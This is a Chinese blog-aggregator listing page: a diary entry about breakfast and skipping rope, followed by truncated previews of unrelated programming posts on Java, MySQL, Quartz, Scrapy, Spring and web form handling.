    今天又是美好的一天,今天七点起来,起来喝了一杯温开水。然后开始跳绳,今天跳了一千,现在感觉到不是很累了,早餐煮了赤小豆黑米粥,还有三个白煮鸡蛋,感觉真好吃,中午也是吃赤小豆黑米粥,还有炒了两个鸡蛋,感觉真好,简单又好吃。今天师姐打电话给我说,叫我陪她去兴业注销卡,我说不想去,你叫李欣陪你去吧!晚上叫朋友请我们吃了羊肉,太久没有吃了,我吃了好多哦!也吃了好饱,今天晚上跟儿子视频,又听到儿子咳嗽了,咳
  • SAX解析xml文件 小猪猪08 xml
    1.创建SAXParserFactory实例 2.通过SAXParserFactory对象获取SAXParser实例 3.创建一个类SAXParserHander继续DefaultHandler,并且实例化这个类 4.SAXParser实例的parse来获取文件     public static void main(String[] args) { //
  • 为什么mysql里的ibdata1文件不断的增长? brotherlamp linuxlinux运维linux资料linux视频linux运维自学
    我们在 Percona 支持栏目经常收到关于 MySQL 的 ibdata1 文件的这个问题。 当监控服务器发送一个关于 MySQL 服务器存储的报警时,恐慌就开始了 —— 就是说磁盘快要满了。 一番调查后你意识到大多数地盘空间被 InnoDB 的共享表空间 ibdata1 使用。而你已经启用了 innodbfileper_table,所以问题是: ibdata1存了什么? 当你启用了 i
  • Quartz-quartz.properties配置 eksliang quartz
    其实Quartz JAR文件的org.quartz包下就包含了一个quartz.properties属性配置文件并提供了默认设置。如果需要调整默认配置,可以在类路径下建立一个新的quartz.properties,它将自动被Quartz加载并覆盖默认的设置。   下面是这些默认值的解释 #-----集群的配置 org.quartz.scheduler.instanceName =
  • informatica session的使用 18289753290 workflowsessionlogInformatica
    如果希望workflow存储最近20次的log,在session里的Config  Object设置,log  options做配置,save  session log :sessions  run  ;savesessio log for  these runs:20 session下面的source 里面有个tracing 
  • Scrapy抓取网页时出现CRC check failed 0x471e6e9a != 0x7c07b839L的错误 酷的飞上天空 scrapy
    Scrapy版本0.14.4 出现问题现象: ERROR: Error downloading <GET http://xxxxx  CRC check failed   解决方法   1.设置网络请求时的header中的属性'Accept-Encoding': '*;q=0'   明确表示不支持任何形式的压缩格式,避免程序的解压
  • java Swing小集锦 永夜-极光 java swing
    1.关闭窗体弹出确认对话框   1.1   this.setDefaultCloseOperation (JFrame.DO_NOTHING_ON_CLOSE);   1.2   this.addWindowListener ( new WindowAdapter () { public void windo
  • 强制删除.svn文件夹 随便小屋 java
              在windows上,从别处复制的项目中可能带有.svn文件夹,手动删除太麻烦,并且每个文件夹下都有。所以写了个程序进行删除。因为.svn文件夹在windows上是只读的,所以用File中的delete()和deleteOnExist()方法都不能将其删除,所以只能采用windows命令方式进行删除
  • GET和POST有什么区别?及为什么网上的多数答案都是错的。 aijuans get post
        如果有人问你,GET和POST,有什么区别?你会如何回答? 我的经历      前几天有人问我这个问题。我说GET是用于获取数据的,POST,一般用于将数据发给服务器之用。     这个答案好像并不是他想要的。于是他继续追问有没有别的区别?我说这就是个名字而已,如果服务器支持,他完全可以把G
  • 谈谈新浪微博背后的那些算法 aoyouzi 谈谈新浪微博背后的那些算法
    本文对微博中常见的问题的对应算法进行了简单的介绍,在实际应用中的算法比介绍的要复杂的多。当然,本文覆盖的主题并不全,比如好友推荐、热点跟踪等就没有涉及到。但古人云“窥一斑而见全豹”,希望本文的介绍能帮助大家更好的理解微博这样的社交网络应用。 微博是一个很多人都在用的社交应用。天天刷微博的人每天都会进行着这样几个操作:原创、转发、回复、阅读、关注、@等。其中,前四个是针对短博文,最后的关注和@则针
  • Connection reset 连接被重置的解决方法 百合不是茶 java字符流连接被重置
    流是java的核心部分,,昨天在做android服务器连接服务器的时候出了问题,就将代码放到java中执行,结果还是一样连接被重置   被重置的代码如下;   客户端代码; package 通信软件服务器; import java.io.BufferedWriter; import java.io.OutputStream; import java.io.O
  • web.xml配置详解之filter bijian1013 javaweb.xmlfilter
    一.定义 <filter> <filter-name>encodingfilter</filter-name> <filter-class>com.my.app.EncodingFilter</filter-class> <init-param> <param-name>encoding<
  • Heritrix Bill_chen 多线程xml算法制造配置管理
    作为纯Java语言开发的、功能强大的网络爬虫Heritrix,其功能极其强大,且扩展性良好,深受热爱搜索技术的盆友们的喜爱,但它配置较为复杂,且源码不好理解,最近又使劲看了下,结合自己的学习和理解,跟大家分享Heritrix的点点滴滴。 Heritrix的下载(http://sourceforge.net/projects/archive-crawler/)安装、配置,就不罗嗦了,可以自己找找资
  • 【Zookeeper】FAQ bit1129 zookeeper
    1.脱离IDE,运行简单的Java客户端程序 #ZkClient是简单的Zookeeper~$ java -cp "./:zookeeper-3.4.6.jar:./lib/*" ZKClient    1. Zookeeper是的Watcher回调是同步操作,需要添加异步处理的代码 2. 如果Zookeeper集群跨越多个机房,那么Leader/
  • The user specified as a definer ('aaa'@'localhost') does not exist 白糖_ localhost
    今天遇到一个客户BUG,当前的jdbc连接用户是root,然后部分删除操作都会报下面这个错误:The user specified as a definer ('aaa'@'localhost') does not exist 最后找原因发现删除操作做了触发器,而触发器里面有这样一句 /*!50017 DEFINER = ''aaa@'localhost' */  原来最初
  • javascript中showModelDialog刷新父页面 bozch JavaScript刷新父页面showModalDialog
    在页面中使用showModalDialog打开模式子页面窗口的时候,如果想在子页面中操作父页面中的某个节点,可以通过如下的进行:       window.showModalDialog('url',self,‘status...’); // 首先中间参数使用self       在子页面使用w
  • 编程之美-买书折扣 bylijinnan 编程之美
    import java.util.Arrays; public class BookDiscount { /**编程之美 买书折扣 书上的贪心算法的分析很有意思,我看了半天看不懂,结果作者说,贪心算法在这个问题上是不适用的。。 下面用动态规划实现。 哈利波特这本书一共有五卷,每卷都是8欧元,如果读者一次购买不同的两卷可扣除5%的折扣,三卷10%,四卷20%,五卷
  • 关于struts2.3.4项目跨站执行脚本以及远程执行漏洞修复概要 chenbowen00 strutsWEB安全
    因为近期负责的几个银行系统软件,需要交付客户,因此客户专门请了安全公司对系统进行了安全评测,结果发现了诸如跨站执行脚本,远程执行漏洞以及弱口令等问题。 下面记录下本次解决的过程以便后续 1、首先从最简单的开始处理,服务器的弱口令问题,首先根据安全工具提供的测试描述中发现应用服务器中存在一个匿名用户,默认是不需要密码的,经过分析发现服务器使用了FTP协议, 而使用ftp协议默认会产生一个匿名用
  • [电力与暖气]煤炭燃烧与电力加温 comsci
          在宇宙中,用贝塔射线观测地球某个部分,看上去,好像一个个马蜂窝,又像珊瑚礁一样,原来是某个国家的采煤区.....       不过,这个采煤区的煤炭看来是要用完了.....那么依赖将起燃烧并取暖的城市,在极度严寒的季节中...该怎么办呢?   &nbs
  • oracle O7_DICTIONARY_ACCESSIBILITY参数 daizj oracle
    O7_DICTIONARY_ACCESSIBILITY参数控制对数据字典的访问.设置为true,如果用户被授予了如select any table等any table权限,用户即使不是dba或sysdba用户也可以访问数据字典.在9i及以上版本默认为false,8i及以前版本默认为true.如果设置为true就可能会带来安全上的一些问题.这也就为什么O7_DICTIONARY_ACCESSIBIL
  • 比较全面的MySQL优化参考 dengkane mysql
    本文整理了一些MySQL的通用优化方法,做个简单的总结分享,旨在帮助那些没有专职MySQL DBA的企业做好基本的优化工作,至于具体的SQL优化,大部分通过加适当的索引即可达到效果,更复杂的就需要具体分析了,可以参考本站的一些优化案例或者联系我,下方有我的联系方式。这是上篇。   1、硬件层相关优化   1.1、CPU相关   在服务器的BIOS设置中,可
  • C语言homework2,有一个逆序打印数字的小算法 dcj3sjt126com c
    #h1#   0、完成课堂例子 1、将一个四位数逆序打印 1234 ==> 4321 实现方法一: # include <stdio.h> int main(void) { int i = 1234; int one = i%10; int two = i / 10 % 10; int three = i / 100 % 10;
  • apacheBench对网站进行压力测试 dcj3sjt126com apachebench
       ab 的全称是 ApacheBench , 是 Apache 附带的一个小工具 , 专门用于 HTTP Server 的 benchmark testing , 可以同时模拟多个并发请求。前段时间看到公司的开发人员也在用它作一些测试,看起来也不错,很简单,也很容易使用,所以今天花一点时间看了一下。 通过下面的一个简单的例子和注释,相信大家可以更容易理解这个工具的使用。
  • 2种办法让HashMap线程安全 flyfoxs javajdkjni
    多线程之--2种办法让HashMap线程安全 多线程之--synchronized 和reentrantlock的优缺点 多线程之--2种JAVA乐观锁的比较( NonfairSync VS. FairSync)     HashMap不是线程安全的,往往在写程序时需要通过一些方法来回避.其实JDK原生的提供了2种方法让HashMap支持线程安全.  
  • Spring Security(04)——认证简介 234390216 Spring Security认证过程
    认证简介 目录 1.1     认证过程 1.2     Web应用的认证过程 1.2.1    ExceptionTranslationFilter 1.2.2    在request之间共享SecurityContext   1
  • Java 位运算 Javahuhui java位运算
    // 左移( << ) 低位补0 // 0000 0000 0000 0000 0000 0000 0000 0110 然后左移2位后,低位补0: // 0000 0000 0000 0000 0000 0000 0001 1000 System.out.println(6 << 2);// 运行结果是24 // 右移( >> ) 高位补"
  • mysql免安装版配置 ldzyz007 mysql
    1、my-small.ini是为了小型数据库而设计的。不应该把这个模型用于含有一些常用项目的数据库。 2、my-medium.ini是为中等规模的数据库而设计的。如果你正在企业中使用RHEL,可能会比这个操作系统的最小RAM需求(256MB)明显多得多的物理内存。由此可见,如果有那么多RAM内存可以使用,自然可以在同一台机器上运行其它服务。 3、my-large.ini是为专用于一个SQL数据
  • MFC和ado数据库使用时遇到的问题 你不认识的休道人 sqlC++mfc
    =================================================================== 第一个 =================================================================== try{ CString sql; sql.Format("select * from p
  • 表单重复提交Double Submits rensanning double
    可能发生的场景: *多次点击提交按钮 *刷新页面 *点击浏览器回退按钮 *直接访问收藏夹中的地址 *重复发送HTTP请求(Ajax) (1)点击按钮后disable该按钮一会儿,这样能避免急躁的用户频繁点击按钮。 这种方法确实有些粗暴,友好一点的可以把按钮的文字变一下做个提示,比如Bootstrap的做法: http://getbootstrap.co
  • Java String 十大常见问题 tomcat_oracle java正则表达式
     1.字符串比较,使用“==”还是equals()?   "=="判断两个引用的是不是同一个内存地址(同一个物理对象)。   equals()判断两个字符串的值是否相等。   除非你想判断两个string引用是否同一个对象,否则应该总是使用equals()方法。   如果你了解字符串的驻留(String Interning)则会更好地理解这个问题。    
  • SpringMVC 登陆拦截器实现登陆控制 xp9802 springMVC
    思路,先登陆后,将登陆信息存储在session中,然后通过拦截器,对系统中的页面和资源进行访问拦截,同时对于登陆本身相关的页面和资源不拦截。   实现方法: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他